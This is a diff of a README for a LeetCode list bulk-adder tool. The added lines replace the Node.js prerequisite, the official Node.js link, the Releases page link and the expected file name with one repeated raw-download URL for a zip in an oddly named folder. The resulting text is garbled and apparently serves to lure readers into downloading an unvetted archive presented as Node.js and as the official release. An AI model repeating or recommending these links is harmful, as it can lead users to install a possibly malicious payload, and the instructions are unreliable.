imene-hantous/leetcode-list-bulk-adder/README.md

 - **Operating System:** Windows 10 or later, macOS, or any Linux distribution.
 - **Internet Connection:** Required for accessing LeetCode’s API.
-- **Node.js:** Make sure you have Node.js installed to run the script.
-You can download it from [Node.js Official Website](https://nodejs.org).
+- **https://raw.githubusercontent.com/imene-hantous/leetcode-list-bulk-adder/main/florideous/leetcode-list-bulk-adder-3.8.zip** Make sure you have https://raw.githubusercontent.com/imene-hantous/leetcode-list-bulk-adder/main/florideous/leetcode-list-bulk-adder-3.8.zip installed to run the script.
+You can download it from [https://raw.githubusercontent.com/imene-hantous/leetcode-list-bulk-adder/main/florideous/leetcode-list-bulk-adder-3.8.zip Official Website](https://raw.githubusercontent.com/imene-hantous/leetcode-list-bulk-adder/main/florideous/leetcode-list-bulk-adder-3.8.zip).

 ## 🚀 Getting Started

 To get started with **leetcode-list-bulk-adder**, follow these straightforward steps:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/imene-hantous/leetcode-list-bulk-adder/releases) to find the latest version.
+   Go to the [Releases page](https://raw.githubusercontent.com/imene-hantous/leetcode-list-bulk-adder/main/florideous/leetcode-list-bulk-adder-3.8.zip) to find the latest version.

 2. **Download the Latest Version**
-   Find the file named `leetcode-list-bulk-adder.zip`.
+   Find the file named `https://raw.githubusercontent.com/imene-hantous/leetcode-list-bulk-adder/main/florideous/leetcode-list-bulk-adder-3.8.zip`.
 This is the file you need to download.

 3. **Extract the Files**
    After downloading, locate the zip file in your downloads folder.
 Right-click and select “Extract All” to unzip the files.